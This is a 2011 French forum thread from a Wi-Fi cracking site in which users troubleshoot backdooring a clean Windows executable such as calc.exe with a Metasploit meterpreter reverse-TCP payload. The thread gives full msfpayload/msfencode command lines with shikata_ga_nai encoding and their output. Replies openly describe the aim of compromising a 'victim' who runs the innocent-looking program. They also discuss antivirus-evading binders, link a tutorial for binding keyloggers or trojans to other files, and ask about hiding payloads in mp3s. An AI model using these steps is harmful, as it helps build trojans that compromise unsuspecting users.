Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 13-09-2011 20:22:31

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Probleme encodage metasploit

Salut j'ai un petit soucis pour suivre ce tuto :lien du tuto

J'ai tester sous bt 5 r1 voila le retour:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R  |./msfencode -t exe -x /home/goliatecalc.exe -k -o /home/goliatecalc_pro.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[-] x86/shikata_ga_nai failed: No such file or directory - /home/goliatecalc.exe
[-] No encoders succeeded.

J'ai le même résultat sous ubuntu 11.04 avec metasploit MAJ par le svn,quelqu'un a une idée pour que je puise encoder un .exe, ou sur mon problème?


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 13-09-2011 20:47:06

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Probleme encodage metasploit

Le tuto que tu cites sert à incruster un backdoor dans un .EXE sain, par exemple la calculatrice Windows. Ainsi, quand la victime lance son programme en apparence innocent, elle se retrouve p'wnée jusqu'à l'os... smile

Le truc, c'est que pour pouvoir incruster ton backdoor dans un EXE sain, il te faut... un EXE sain ! Que tu ne sembles pas avoir puisqu'il te met que ce fichier (l'argument de "-x") n'existe pas wink

Télécharge la calculatrice Windows, renomme-la en /home/goliatecalc.exe et relance la commande ça devrait passer smile

Hors Ligne

#3 13-09-2011 20:54:58

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Probleme encodage metasploit

Merci de ta réponse, enfaîte en me relisant j'ai vu que je me suis planter dans la syntaxe ><.

Bon sinon j'ai dl un autre log.exe mais la il me sort un erreur que je ne connaît pas:

[email protected]:/home/goliate/pentest/metasploit# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R  |./msfencode -t exe -x /home/goliate/calc.exe -k -o /home/goliate/calc_pro.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[-] x86/shikata_ga_nai failed: Junk at end of file. Is this a packed exe?
[-] No encoders succeeded.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#4 13-09-2011 20:58:56

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Probleme encodage metasploit

[-] x86/shikata_ga_nai failed: Junk at end of file. Is this a packed exe?
[-] No encoders succeeded.

Ca peut avoir 2 origines :
- le .EXE de base (celui qui est sain) est bizarre ou compressé, donc l'encodage se vautre
- tu as tellement encodé ton exécutable qu'il devient illisible
(je penche pour la première solution)

Hors Ligne

#5 13-09-2011 21:06:24

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Probleme encodage metasploit

antares145 a écrit :
[-] x86/shikata_ga_nai failed: Junk at end of file. Is this a packed exe?
[-] No encoders succeeded.

Ca peut avoir 2 origines :
- le .EXE de base (celui qui est sain) est bizarre ou compressé, donc l'encodage se vautre
- tu as tellement encodé ton exécutable qu'il devient illisible
(je penche pour la première solution)

Je pense plus comme toi bon il ne me reste plus qu'a trouvé un .exe exploitable ^^.

Au passage je voulais savoir si il était possible de faire la même chose avec des fichier autre CAD (.avi .mp3), je voudrais implanter un playload dans un mp3.


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#6 13-09-2011 21:11:15

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Probleme encodage metasploit

Là c'est un binder qu'il te faut, pour "lier" les 2 fichiers, parce que le fichier de base n'est pas exécutable. Je n'en connais pas comme ça mais c'est pas très difficile à trouver. Un bon binder par contre, du genre qui ne fait pas hurler l'antivirus, c'est + rare smile

Il y a la technique de iexpress aussi (intégré à Windows), mais là ça "transforme" ton fichier de base en EXE qui lance les 2 (le fichier de base et le backdoor) --> How to bind or attach a keylogger or trojan with other file (iexpress Tutorial)

Hors Ligne

#7 14-09-2011 08:51:35

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Probleme encodage metasploit

Je te remercie pour tes renseignement antares


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#8 14-09-2011 11:59:50

Jack Sparrow
Membre Indéboulonnable
Inscription : 04-12-2010
Messages : 101

Re : Probleme encodage metasploit

Il y a la technique de iexpress aussi (intégré à Windows), mais là ça "transforme" ton fichier de base en EXE qui lance les 2 (le fichier de base et le backdoor) --> How to bind or attach a keylogger or trojan with other file (iexpress Tutorial)

Super tuto, merci pour le lien antares! smile

Hors Ligne

#9 14-09-2011 17:14:43

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Probleme encodage metasploit

Merci j'ai regarder le lien mais bon je me mefie des log kiddie ^^.Mais merci de m'avoir donner la marche a suivre


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#10 15-09-2011 21:00:48

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Probleme encodage metasploit

Je voulais savoir si quelqu'un a réusit sa avec BT 5?


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#11 15-09-2011 21:53:42

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Probleme encodage metasploit

Ca fonctionne sur BT5 R1 wink

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 R  |./msfencode -t exe -x /home/calc.exe -k -o /home/calc_pro.exe -e x86/shikata_ga_nai -c 5

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

Hors Ligne

#12 15-09-2011 22:21:40

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Probleme encodage metasploit

tu a tester avec quel .exe Fuji stp?


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#13 15-09-2011 22:35:47

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Probleme encodage metasploit

Et bien la calculatrice Windows comme toi smile

Hors Ligne

#14 15-09-2011 22:39:20

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Probleme encodage metasploit

Fuji a écrit :

Et bien la calculatrice Windows comme toi smile

ok merci pour info tu a update metasploit?
Bon la j'ai tester d'encoder le .exe de wow ( et oui je l'avais sous la main ><) et sous ma ubuntu sa a fonctionné je v voir sous bt.
Merci fuji

Dernière modification par goliate (15-09-2011 22:41:41)


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#15 15-09-2011 22:41:30

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Probleme encodage metasploit

Non j'ai pas fais une mise à jour, et puis d'ailleurs ça n'a rien à voir avec cette m-à-jour puisque Metasploit s'est le faire depuis longtemps, à savoir encoder et intégrer meterpreter dans un autre fichier.exe.

Dernière modification par Fuji (15-09-2011 22:57:44)

Hors Ligne

#16 15-09-2011 22:46:45

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Probleme encodage metasploit

ok merci j'ai edit mon post du dessus


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
2 147 04-12-2016 21:54:52 par GreyBird
4 187 04-12-2016 16:20:59 par pwerrick
Problème reaver par Antho3674
4 304 15-11-2016 22:05:12 par kcdtv
3 343 14-08-2016 10:22:07 par MiscL
5 733 18-07-2016 23:13:58 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]